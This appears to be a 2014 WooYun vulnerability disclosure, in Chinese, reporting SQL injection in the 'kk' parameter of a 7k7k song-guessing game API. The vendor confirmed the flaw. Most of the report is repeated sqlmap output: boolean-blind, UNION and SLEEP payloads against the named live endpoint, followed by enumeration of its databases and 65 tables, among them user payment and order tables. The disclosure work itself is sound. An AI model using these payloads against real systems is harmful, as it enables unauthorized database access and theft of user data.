漏洞详情

披露状态:

2014-02-27: 细节已通知厂商并且等待厂商处理中
2014-02-27: 厂商已经确认,细节仅向厂商公开
2014-03-09: 细节向核心白帽子及相关领域专家公开
2014-03-19: 细节向普通白帽子公开
2014-03-29: 细节向实习白帽子公开
2014-04-13: 细节向公众公开

简要描述:

奇客星空某KK猜歌API接口SQL注射

详细说明:

http://api.cg.7k7k.com/contest/get_nearestplaylist.php?kk=2565412332&num=3

kk参数存在注射

漏洞证明:

sqlmap identified the following injection points with a total of 36 HTTP(s) requests:

---

Place: GET

Parameter: kk

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3



Type: UNION query

Title: MySQL UNION query (NULL) - 1 column

Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3

---

back-end DBMS: MySQL 5.0.11

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: kk

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3



Type: UNION query

Title: MySQL UNION query (NULL) - 1 column

Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3

---

back-end DBMS: MySQL 5.0.11

available databases [3]:

[*] cgw_new

[*] information_schema

[*] test



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: kk

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3



Type: UNION query

Title: MySQL UNION query (NULL) - 1 column

Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3

---

back-end DBMS: MySQL 5.0.11

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: kk

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3



Type: UNION query

Title: MySQL UNION query (NULL) - 1 column

Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3

---

back-end DBMS: MySQL 5.0.11

Database: cgw_new

[65 tables]

+--------------------------------------------------+

| cgw_announcements |

| cgw_prod_activities_achievements_settings |

| cgw_prod_activities_achievements_settings_levels |

| cgw_prod_activities_dailytask_actions |

| cgw_prod_activities_dailytask_rewards |

| cgw_prod_activities_entries |

| cgw_prod_activity_center_activity |

| cgw_prod_activity_center_advert |

| cgw_prod_album |

| cgw_prod_bulletin_default_msg |

| cgw_prod_contest |

| cgw_prod_exp |

| cgw_prod_feeds_limit |

| cgw_prod_feeds_share |

| cgw_prod_hints |

| cgw_prod_home_info |

| cgw_prod_home_info_actions |

| cgw_prod_homepage_advert |

| cgw_prod_icon_center |

| cgw_prod_items |

| cgw_prod_logondays |

| cgw_prod_packs |

| cgw_prod_playlists |

| cgw_prod_shop |

| cgw_prod_signin_rewards |

| cgw_prod_singer |

| cgw_prod_songs |

| cgw_user_album |

| cgw_user_animation |

| cgw_user_board |

| cgw_user_contest |

| cgw_user_contest_log |

| cgw_user_daily_rank |

| cgw_user_dailytask_rewards |

| cgw_user_exinfo |

| cgw_user_exp_log |

| cgw_user_flower_info |

| cgw_user_friends |

| cgw_user_gifts |

| cgw_user_got_vip_award |

| cgw_user_homeinfo |

| cgw_user_info |

| cgw_user_items |

| cgw_user_items_log |

| cgw_user_logon_log |

| cgw_user_logondays_log |

| cgw_user_mobile |

| cgw_user_opponents |

| cgw_user_orderinfo |

| cgw_user_pay_log |

| cgw_user_playlists |

| cgw_user_playlists_log |

| cgw_user_points |

| cgw_user_points_log |

| cgw_user_record |

| cgw_user_send_flowers |

| cgw_user_settings |

| cgw_user_signin_log |

| cgw_user_signin_rewards |

| cgw_user_status |

| cgw_user_task_log |

| cgw_user_tournament |

| cgw_user_vipinfo |

| cgw_user_visit |

| cgw_user_weekly_rank |

+--------------------------------------------------+

修复方案:

你懂的

版权声明:转载请注明来源 Neeke@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-02-27 16:26

厂商回复:

感谢白帽作者反馈,确实有此漏洞,已修复,之后联系作者发送小礼物,希望和白帽人员进行合作

最新状态:

暂无


漏洞评价: